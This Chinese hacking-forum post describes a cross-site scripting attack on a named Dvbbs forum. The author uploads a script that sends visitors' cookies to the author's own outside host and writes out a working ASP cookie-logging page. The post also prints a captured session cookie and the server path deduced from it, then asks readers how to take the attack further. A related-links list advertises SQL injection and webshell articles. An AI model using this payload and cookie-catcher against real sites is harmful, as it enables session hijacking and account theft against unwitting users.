关于动网的cookie泻露站点绝路径的问题

所属分类: 网络编程 / 黑客相关 阅读数: 1401
收藏 0 赞 0 分享
一、跨站测试
先看看我的一次跨站测试吧
我以职业欠钱的站点做测试吧:
Host:zhiyeqianqian.51web.cn
My Test:
先在他的论谈上传两张图,
图一的内容是:
<script>document.location='http://linzi.cnbct.org/cookie.asp?msg='+document.cookie</script>
得到url为UploadFile/2005-6/200562716565777847.jpg
图二则是偶的个人照
UploadFile/2005-6/200562716563048909.jpg
写个盗cookie的代码到我的空间,lcx的盗cookie代码有问题,所以修改了一下。
<%
cookiefile=Server.MapPath("cookie.txt")
set fs=server.CreateObject("scripting.filesystemobject")
set cookiefile=fs.OpenTextfile(cookiefile,8,True,0)
cookiefile.Write(Request.QueryString&"<br>")
cookiefile.close
set fs = nothing
%>
<META HTTP-EQUIV="Refresh" CONTENT="0;URL= http://zhiyeqianqian.51web.cn/UploadFile/2005-6/200562716563048909.jpg">
接下来,点击图一,自动转到图二,

二、结果分析
再到我的空间看一下,抓到cookie如下:
msg=ewwwrootzhiyeqianqianwwwroot=UserID=218&usercookies=1&StatUserID=2190418138&password=想要吗?嘿嘿&userhidden=2&userclass=%D0%C2%CA%D6%C9%CF%C2%B7&username=linzi;%20ASPSESSIONIDQSCAAQTB=HMPLNIMDHOCDJKPELPGBBOOG;%20Dvbbs;%20DvbbsMagicFace=862;%20upNum=2;%20ASPSESSIONIDQSAAARTB=JBPPMONDDEGFGHEOICDHFJIM<br>
分析cookie我们不难看出他的绝对路径是e:\wwwroot\zhiyeqianqian\wwwroot


三、论谈
本来,最初的测试我是在测试BCT论谈,成功暴出他的绝对路径,一开始的时候,我还认为可能又是动网出洞洞了,所以又去测试了其它几个站,测试结果是其它的站点并没有暴出路径,今天再次测试“欠我钱”的论谈,却又暴不出来,查了一下代码,和别人的代码一个样,根本没什么差别。
偶想听听大家的看法,到底是哪里出了问题,能不能深入利用~~~
更多精彩内容其他人还在看

黑客入侵Windows XP系统常用七大招数

黑客入侵Windows XP系统常用七大招数
收藏 0 赞 0 分享

风讯4.0未公开Bug

风讯4.0未公开Bug
收藏 0 赞 0 分享

Discuz! 4.x SQL injection / admin credentials disclosure exploit

Discuz! 4.x SQL injection / admin credentials disclosure exploit
收藏 0 赞 0 分享

discuz许愿池插件远程包含漏洞

discuz许愿池插件远程包含漏洞
收藏 0 赞 0 分享

防止电脑被他人控制

防止电脑被他人控制
收藏 0 赞 0 分享

最详细的SQL注入相关的命令整理 (转)第1/2页

这篇文章主要为打击分享下一些常用SQL注入相关的命令,今天帮客户做安装的时候发现他的网站有很多漏洞,导致注入数据库也被清空了,希望大家多关于安全
收藏 0 赞 0 分享

渗透中用openrowset搞shell的方法

渗透中用openrowset搞shell的方法
收藏 0 赞 0 分享

当网站不允许上传asp cer cdx htr文件时的一个解决方法!

当网站不允许上传asp cer cdx htr文件时的一个解决方法!
收藏 0 赞 0 分享

PHPSHELL又出新东东啦!

PHPSHELL又出新东东啦!
收藏 0 赞 0 分享

全面了解ASP注入方法 [收集总结]

全面了解ASP注入方法 [收集总结]
收藏 0 赞 0 分享
查看更多